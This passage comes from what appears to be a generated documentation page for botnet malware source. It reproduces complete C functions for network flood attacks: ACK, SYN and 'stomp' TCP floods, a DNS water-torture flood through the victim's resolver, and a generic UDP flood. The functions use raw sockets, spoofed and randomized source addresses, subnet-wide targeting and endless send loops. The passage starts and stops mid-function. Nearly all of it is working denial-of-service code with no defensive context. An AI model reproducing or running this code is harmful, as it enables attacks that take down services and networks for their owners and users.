References attack_target::addr, ATK_OPT_ACK, ATK_OPT_ACKRND, ATK_OPT_DPORT, ATK_OPT_FIN, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_PAYLOAD_RAND, ATK_OPT_PAYLOAD_SIZE, ATK_OPT_PSH, ATK_OPT_RST, ATK_OPT_SEQRND, ATK_OPT_SOURCE, ATK_OPT_SPORT, ATK_OPT_SYN, ATK_OPT_URG, attack_get_opt_int(), attack_get_opt_ip(), checksum_generic(), checksum_tcpudp(), close, data_len, FALSE, LOCAL_ADDR, rand_next(), rand_str(), attack_target::sock_addr, socket, and TRUE.
Referenced by attack_init().
 {
     int i, fd;
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, FALSE);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
     uint32_t seq = attack_get_opt_int(opts_len, opts, ATK_OPT_SEQRND, 0xffff);
     uint32_t ack = attack_get_opt_int(opts_len, opts, ATK_OPT_ACKRND, 0xffff);
     BOOL urg_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_URG, FALSE);
     BOOL ack_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_ACK, TRUE);
     BOOL psh_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_PSH, FALSE);
     BOOL rst_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_RST, FALSE);
     BOOL syn_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_SYN, FALSE);
     BOOL fin_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_FIN, FALSE);
     int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
     uint32_t source_ip = attack_get_opt_ip(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to create raw socket. Aborting attack\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(fd);
         return;
     }
     for (i = 0; i < targs_len; i++)
     {
         struct iphdr *iph;
         struct tcphdr *tcph;
         char *payload;
         pkts[i] = calloc(1510, sizeof (char));
         iph = (struct iphdr *)pkts[i];
         tcph = (struct tcphdr *)(iph + 1);
         payload = (char *)(tcph + 1);
         iph->version = 4;
         iph->ihl = 5;
         iph->tos = ip_tos;
         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
         iph->id = htons(ip_ident);
         iph->ttl = ip_ttl;
         if (dont_frag)
             iph->frag_off = htons(1 << 14);
         iph->protocol = IPPROTO_TCP;
         iph->saddr = source_ip;
         iph->daddr = targs[i].addr;
         tcph->source = htons(sport);
         tcph->dest = htons(dport);
         tcph->seq = htons(seq);
         tcph->doff = 5;
         tcph->urg = urg_fl;
         tcph->ack = ack_fl;
         tcph->psh = psh_fl;
         tcph->rst = rst_fl;
         tcph->syn = syn_fl;
         tcph->fin = fin_fl;
         tcph->window = rand_next() & 0xffff;
         if (psh_fl)
             tcph->psh = TRUE;
         rand_str(payload, data_len);
     }
 //    targs[0].sock_addr.sin_port = tcph->dest;
 //    if (sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[0].sock_addr, sizeof (struct sockaddr_in)) < 1)
 //    {
 //
 //    }
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
             char *data = (char *)(tcph + 1);
             // For prefix attacks
             if (targs[i].netmask < 32)
                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
             if (source_ip == 0xffffffff)
                 iph->saddr = rand_next();
             if (ip_ident == 0xffff)
                 iph->id = rand_next() & 0xffff;
             if (sport == 0xffff)
                 tcph->source = rand_next() & 0xffff;
             if (dport == 0xffff)
                 tcph->dest = rand_next() & 0xffff;
             if (seq == 0xffff)
                 tcph->seq = rand_next();
             if (ack == 0xffff)
                 tcph->ack_seq = rand_next();
             // Randomize packet content?
             if (data_rand)
                 rand_str(data, data_len);
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             tcph->check = 0;
             tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr) + data_len), sizeof (struct tcphdr) + data_len);
             targs[i].sock_addr.sin_port = tcph->dest;
             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
             break;
             if (errno != 0)
                 printf("errno = %d\n", errno);
 #endif
     }
 }
void attack_tcp_stomp (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 293 of file attack_tcp.c.
References attack_stomp_data::ack_seq, attack_target::addr, attack_stomp_data::addr, ATK_OPT_ACK, ATK_OPT_DPORT, ATK_OPT_FIN, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_PAYLOAD_RAND, ATK_OPT_PAYLOAD_SIZE, ATK_OPT_PSH, ATK_OPT_RST, ATK_OPT_SYN, ATK_OPT_URG, attack_get_opt_int(), checksum_generic(), checksum_tcpudp(), close, connect, data_len, attack_stomp_data::dport, FALSE, LOCAL_ADDR, rand_next(), rand_str(), attack_stomp_data::seq, attack_target::sock_addr, socket, attack_stomp_data::sport, and TRUE.
Referenced by attack_init().
 {
     int i, rfd;
     struct attack_stomp_data *stomp_data = calloc(targs_len, sizeof (struct attack_stomp_data));
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
     BOOL urg_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_URG, FALSE);
     BOOL ack_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_ACK, TRUE);
     BOOL psh_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_PSH, TRUE);
     BOOL rst_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_RST, FALSE);
     BOOL syn_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_SYN, FALSE);
     BOOL fin_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_FIN, FALSE);
     int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 768);
     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
     // Set up receive socket
     if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
     {
 #ifdef DEBUG
         printf("Could not open raw socket!\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(rfd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(rfd);
         return;
     }
     // Retrieve all ACK/SEQ numbers
     for (i = 0; i < targs_len; i++)
     {
         int fd;
         struct sockaddr_in addr, recv_addr;
         socklen_t recv_addr_len;
         char pktbuf[256];
         time_t start_recv;
         stomp_setup_nums:
         if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
         {
 #ifdef DEBUG
             printf("Failed to create socket!\n");
 #endif
             continue;
         }
         // Set it in nonblocking mode
         fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK);
         // Set up address to connect to
         addr.sin_family = AF_INET;
         if (targs[i].netmask < 32)
             addr.sin_addr.s_addr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
         else
             addr.sin_addr.s_addr = targs[i].addr;
         if (dport == 0xffff)
             addr.sin_port = rand_next() & 0xffff;
         else
             addr.sin_port = htons(dport);
         // Actually connect, nonblocking
         connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
         start_recv = time(NULL);
         // Get info
         while (TRUE)
         {
             int ret;
             recv_addr_len = sizeof (struct sockaddr_in);
             ret = recvfrom(rfd, pktbuf, sizeof (pktbuf), MSG_NOSIGNAL, (struct sockaddr *)&recv_addr, &recv_addr_len);
             if (ret == -1)
             {
 #ifdef DEBUG
                 printf("Could not listen on raw socket!\n");
 #endif
                 return;
             }
             if (recv_addr.sin_addr.s_addr == addr.sin_addr.s_addr && ret > (sizeof (struct iphdr) + sizeof (struct tcphdr)))
             {
                 struct tcphdr *tcph = (struct tcphdr *)(pktbuf + sizeof (struct iphdr));
                 if (tcph->source == addr.sin_port)
                 {
                     if (tcph->syn && tcph->ack)
                     {
                         struct iphdr *iph;
                         struct tcphdr *tcph;
                         char *payload;
                         stomp_data[i].addr = addr.sin_addr.s_addr;
                         stomp_data[i].seq = ntohl(tcph->seq);
                         stomp_data[i].ack_seq = ntohl(tcph->ack_seq);
                         stomp_data[i].sport = tcph->dest;
                         stomp_data[i].dport = addr.sin_port;
 #ifdef DEBUG
                         printf("ACK Stomp got SYN+ACK!\n");
 #endif
                         // Set up the packet
                         pkts[i] = malloc(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
                         iph = (struct iphdr *)pkts[i];
                         tcph = (struct tcphdr *)(iph + 1);
                         payload = (char *)(tcph + 1);
                         iph->version = 4;
                         iph->ihl = 5;
                         iph->tos = ip_tos;
                         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
                         iph->id = htons(ip_ident);
                         iph->ttl = ip_ttl;
                         if (dont_frag)
                             iph->frag_off = htons(1 << 14);
                         iph->protocol = IPPROTO_TCP;
                         iph->saddr = LOCAL_ADDR;
                         iph->daddr = stomp_data[i].addr;
                         tcph->source = stomp_data[i].sport;
                         tcph->dest = stomp_data[i].dport;
                         tcph->seq = stomp_data[i].ack_seq;
                         tcph->ack_seq = stomp_data[i].seq;
                         tcph->doff = 8;
                         tcph->fin = TRUE;
                         tcph->ack = TRUE;
                         tcph->window = rand_next() & 0xffff;
                         tcph->urg = urg_fl;
                         tcph->ack = ack_fl;
                         tcph->psh = psh_fl;
                         tcph->rst = rst_fl;
                         tcph->syn = syn_fl;
                         tcph->fin = fin_fl;
                         rand_str(payload, data_len);
                         break;
                     }
                     else if (tcph->fin || tcph->rst)
                     {
                         close(fd);
                         goto stomp_setup_nums;
                     }
                 }
             }
             if (time(NULL) - start_recv > 10)
             {
 #ifdef DEBUG
                 printf("Couldn't connect to host for ACK Stomp in time. Retrying\n");
 #endif
                 close(fd);
                 goto stomp_setup_nums;
             }
         }
     }
     // Start spewing out traffic
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
             char *data = (char *)(tcph + 1);
             if (ip_ident == 0xffff)
                 iph->id = rand_next() & 0xffff;
             if (data_rand)
                 rand_str(data, data_len);
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             tcph->seq = htons(stomp_data[i].seq++);
             tcph->ack_seq = htons(stomp_data[i].ack_seq);
             tcph->check = 0;
             tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr) + data_len), sizeof (struct tcphdr) + data_len);
             targs[i].sock_addr.sin_port = tcph->dest;
             sendto(rfd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
             break;
             if (errno != 0)
                 printf("errno = %d\n", errno);
 #endif
     }
 }
void attack_tcp_syn (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 18 of file attack_tcp.c.
References attack_target::addr, ATK_OPT_ACK, ATK_OPT_ACKRND, ATK_OPT_DPORT, ATK_OPT_FIN, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_PSH, ATK_OPT_RST, ATK_OPT_SEQRND, ATK_OPT_SOURCE, ATK_OPT_SPORT, ATK_OPT_SYN, ATK_OPT_URG, attack_get_opt_int(), attack_get_opt_ip(), checksum_generic(), checksum_tcpudp(), close, FALSE, LOCAL_ADDR, PROTO_TCP_OPT_MSS, PROTO_TCP_OPT_SACK, PROTO_TCP_OPT_TSVAL, PROTO_TCP_OPT_WSS, rand_next(), attack_target::sock_addr, socket, and TRUE.
Referenced by attack_init().
 {
     int i, fd;
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
     uint32_t seq = attack_get_opt_int(opts_len, opts, ATK_OPT_SEQRND, 0xffff);
     uint32_t ack = attack_get_opt_int(opts_len, opts, ATK_OPT_ACKRND, 0);
     BOOL urg_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_URG, FALSE);
     BOOL ack_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_ACK, FALSE);
     BOOL psh_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_PSH, FALSE);
     BOOL rst_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_RST, FALSE);
     BOOL syn_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_SYN, TRUE);
     BOOL fin_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_FIN, FALSE);
     uint32_t source_ip = attack_get_opt_ip(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to create raw socket. Aborting attack\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(fd);
         return;
     }
     for (i = 0; i < targs_len; i++)
     {
         struct iphdr *iph;
         struct tcphdr *tcph;
         uint8_t *opts;
         pkts[i] = calloc(128, sizeof (char));
         iph = (struct iphdr *)pkts[i];
         tcph = (struct tcphdr *)(iph + 1);
         opts = (uint8_t *)(tcph + 1);
         iph->version = 4;
         iph->ihl = 5;
         iph->tos = ip_tos;
         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr) + 20);
         iph->id = htons(ip_ident);
         iph->ttl = ip_ttl;
         if (dont_frag)
             iph->frag_off = htons(1 << 14);
         iph->protocol = IPPROTO_TCP;
         iph->saddr = source_ip;
         iph->daddr = targs[i].addr;
         tcph->source = htons(sport);
         tcph->dest = htons(dport);
         tcph->seq = htons(seq);
         tcph->doff = 10;
         tcph->urg = urg_fl;
         tcph->ack = ack_fl;
         tcph->psh = psh_fl;
         tcph->rst = rst_fl;
         tcph->syn = syn_fl;
         tcph->fin = fin_fl;
         // TCP MSS
         *opts++ = PROTO_TCP_OPT_MSS;    // Kind
         *opts++ = 4;                    // Length
         *((uint16_t *)opts) = htons(1400 + (rand_next() & 0x0f));
         opts += sizeof (uint16_t);
         // TCP SACK permitted
         *opts++ = PROTO_TCP_OPT_SACK;
         *opts++ = 2;
         // TCP timestamps
         *opts++ = PROTO_TCP_OPT_TSVAL;
         *opts++ = 10;
         *((uint32_t *)opts) = rand_next();
         opts += sizeof (uint32_t);
         *((uint32_t *)opts) = 0;
         opts += sizeof (uint32_t);
         // TCP nop
         *opts++ = 1;
         // TCP window scale
         *opts++ = PROTO_TCP_OPT_WSS;
         *opts++ = 3;
         *opts++ = 6; // 2^6 = 64, window size scale = 64
     }
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
             // For prefix attacks
             if (targs[i].netmask < 32)
                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
             if (source_ip == 0xffffffff)
                 iph->saddr = rand_next();
             if (ip_ident == 0xffff)
                 iph->id = rand_next() & 0xffff;
             if (sport == 0xffff)
                 tcph->source = rand_next() & 0xffff;
             if (dport == 0xffff)
                 tcph->dest = rand_next() & 0xffff;
             if (seq == 0xffff)
                 tcph->seq = rand_next();
             if (ack == 0xffff)
                 tcph->ack_seq = rand_next();
             if (urg_fl)
                 tcph->urg_ptr = rand_next() & 0xffff;
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             tcph->check = 0;
             tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr) + 20), sizeof (struct tcphdr) + 20);
             targs[i].sock_addr.sin_port = tcph->dest;
             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + 20, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
             break;
             if (errno != 0)
                 printf("errno = %d\n", errno);
 #endif
     }
 }
void attack_udp_dns (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 230 of file attack_udp.c.
References ATK_OPT_DNS_HDR_ID, ATK_OPT_DOMAIN, ATK_OPT_DPORT, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_PAYLOAD_SIZE, ATK_OPT_SPORT, attack_get_opt_int(), attack_get_opt_str(), checksum_generic(), checksum_tcpudp(), close, data_len, domain(), FALSE, get_dns_resolver(), dnshdr::id, LOCAL_ADDR, dnshdr::opts, PROTO_DNS_QCLASS_IP, PROTO_DNS_QTYPE_A, dns_question::qclass, dnshdr::qdcount, dns_question::qtype, rand_alphastr(), rand_next(), attack_target::sock_addr, socket, TRUE, util_memcpy(), and util_strlen().
Referenced by attack_init().
 {
     int i, fd;
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, FALSE);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 53);
     uint16_t dns_hdr_id = attack_get_opt_int(opts_len, opts, ATK_OPT_DNS_HDR_ID, 0xffff);
     uint8_t data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 12);
     char *domain = attack_get_opt_str(opts_len, opts, ATK_OPT_DOMAIN, NULL);
     int domain_len;
     ipv4_t dns_resolver = get_dns_resolver();
     if (domain == NULL)
     {
 #ifdef DEBUG
         printf("Cannot send DNS flood without a domain\n");
 #endif
         return;
     }
     domain_len = util_strlen(domain);
     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to create raw socket. Aborting attack\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(fd);
         return;
     }
     for (i = 0; i < targs_len; i++)
     {
         int ii;
         uint8_t curr_word_len = 0, num_words = 0;
         struct iphdr *iph;
         struct udphdr *udph;
         struct dnshdr *dnsh;
         char *qname, *curr_lbl;
         struct dns_question *dnst;
         pkts[i] = calloc(600, sizeof (char));
         iph = (struct iphdr *)pkts[i];
         udph = (struct udphdr *)(iph + 1);
         dnsh = (struct dnshdr *)(udph + 1);
         qname = (char *)(dnsh + 1);
         iph->version = 4;
         iph->ihl = 5;
         iph->tos = ip_tos;
         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + sizeof (struct dnshdr) + 1 + data_len + 2 + domain_len + sizeof (struct dns_question));
         iph->id = htons(ip_ident);
         iph->ttl = ip_ttl;
         if (dont_frag)
             iph->frag_off = htons(1 << 14);
         iph->protocol = IPPROTO_UDP;
         iph->saddr = LOCAL_ADDR;
         iph->daddr = dns_resolver;
         udph->source = htons(sport);
         udph->dest = htons(dport);
         udph->len = htons(sizeof (struct udphdr) + sizeof (struct dnshdr) + 1 + data_len + 2 + domain_len + sizeof (struct dns_question));
         dnsh->id = htons(dns_hdr_id);
         dnsh->opts = htons(1 << 8); // Recursion desired
         dnsh->qdcount = htons(1);
         // Fill out random area
         *qname++ = data_len;
         qname += data_len;
         curr_lbl = qname;
         util_memcpy(qname + 1, domain, domain_len + 1); // Null byte at end needed
         // Write in domain
         for (ii = 0; ii < domain_len; ii++)
         {
             if (domain[ii] == '.')
             {
                 *curr_lbl = curr_word_len;
                 curr_word_len = 0;
                 num_words++;
                 curr_lbl = qname + ii + 1;
             }
             else
                 curr_word_len++;
         }
         *curr_lbl = curr_word_len;
         dnst = (struct dns_question *)(qname + domain_len + 2);
         dnst->qtype = htons(PROTO_DNS_QTYPE_A);
         dnst->qclass = htons(PROTO_DNS_QCLASS_IP);
     }
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct udphdr *udph = (struct udphdr *)(iph + 1);
             struct dnshdr *dnsh = (struct dnshdr *)(udph + 1);
             char *qrand = ((char *)(dnsh + 1)) + 1;
             if (ip_ident == 0xffff)
                 iph->id = rand_next() & 0xffff;
             if (sport == 0xffff)
                 udph->source = rand_next() & 0xffff;
             if (dport == 0xffff)
                 udph->dest = rand_next() & 0xffff;
             if (dns_hdr_id == 0xffff)
                 dnsh->id = rand_next() & 0xffff;
             rand_alphastr((uint8_t *)qrand, data_len);
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             udph->check = 0;
             udph->check = checksum_tcpudp(iph, udph, udph->len, sizeof (struct udphdr) + sizeof (struct dnshdr) + 1 + data_len + 2 + domain_len + sizeof (struct dns_question));
             targs[i].sock_addr.sin_addr.s_addr = dns_resolver;
             targs[i].sock_addr.sin_port = udph->dest;
             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct udphdr) + sizeof (struct dnshdr) + 1 + data_len + 2 + domain_len + sizeof (struct dns_question), MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
             break;
             if (errno != 0)
                 printf("errno = %d\n", errno);
 #endif
     }
 }
void attack_udp_generic (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 25 of file attack_udp.c.
References attack_target::addr, ATK_OPT_DPORT, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_PAYLOAD_RAND, ATK_OPT_PAYLOAD_SIZE, ATK_OPT_SOURCE, ATK_OPT_SPORT, attack_get_opt_int(), checksum_generic(), checksum_tcpudp(), close, data_len, FALSE, LOCAL_ADDR, rand_next(), rand_str(), attack_target::sock_addr, socket, and TRUE.
Referenced by attack_init().
 {
     int i, fd;
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, FALSE);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
     uint16_t data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
     uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
     if (data_len > 1460)
         data_len = 1460;
     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to create raw socket. Aborting attack\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(fd);
         return;
     }
     for (i = 0; i < targs_len; i++)
     {
         struct iphdr *iph;
         struct udphdr *udph;
         pkts[i] = calloc(1510, sizeof (char));
         iph = (struct iphdr *)pkts[i];
         udph = (struct udphdr *)(iph + 1);
         iph->version = 4;
         iph->ihl = 5;
         iph->tos = ip_tos;
         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
         iph->id = htons(ip_ident);
         iph->ttl = ip_ttl;
         if (dont_frag)
             iph->frag_off = htons(1 << 14);
         iph->protocol = IPPROTO_UDP;
         iph->saddr = source_ip;
         iph->daddr = targs[i].addr;
         udph->source = htons(sport);
         udph->dest = htons(dport);
         udph->len = htons(sizeof (struct udphdr) + data_len);
     }
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct udphdr *udph = (struct udphdr *)(iph + 1);
             char *data = (char *)(udph + 1);
             // For prefix attacks
             if (targs[i].netmask < 32)
                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
             if (source_ip == 0xffffffff)
                 iph->saddr = rand_next();
             if (ip_ident == 0xffff)
                 iph->id = (uint16_t)rand_next();
             if (sport == 0xffff)
                 udph->source = rand_next();
             if (dport == 0xffff)
                 udph->dest = rand_next();
             // Randomize packet content?
             if (data_rand)
                 rand_str(data, data_len);
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             udph->check = 0;
             udph->check = checksum_tcpudp(iph, udph, udph->len, sizeof (struct udphdr) + data_len);
             targs[i].sock_addr.sin_port = udph->dest;
             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct udphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
             break;
             if (errno != 0)
                 printf("errno = %d\n", errno);
 #endif
     }
 }
void attack_udp_plain (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 375 of file attack_udp.c.
References ATK_OPT_DPORT, ATK_OPT_PAYLOAD_RAND, ATK_OPT_PAYLOAD_SIZE, ATK_OPT_SPORT, attack_get_opt_int(), connect, data_len, rand_next(), rand_str(), attack_target::sock_addr, socket, and TRUE.
Referenced by attack_init().
 {
 #ifdef DEBUG
     printf("in udp plain\n");
 #endif
     int i;
     char **pkts = calloc(targs_len, sizeof (char *));
     int *fds = calloc(targs_len, sizeof (int));
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     uint16_t data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
     struct sockaddr_in bind_addr = {0};
     if (sport == 0xffff)
     {
         sport = rand_next();
     } else {
         sport = htons(sport);
     }
 #ifdef DEBUG
     printf("after args\n");
 #endif
     for (i = 0; i < targs_len; i++)
     {
         struct iphdr *iph;
         struct udphdr *udph;
         char *data;
         pkts[i] = calloc(65535, sizeof (char));
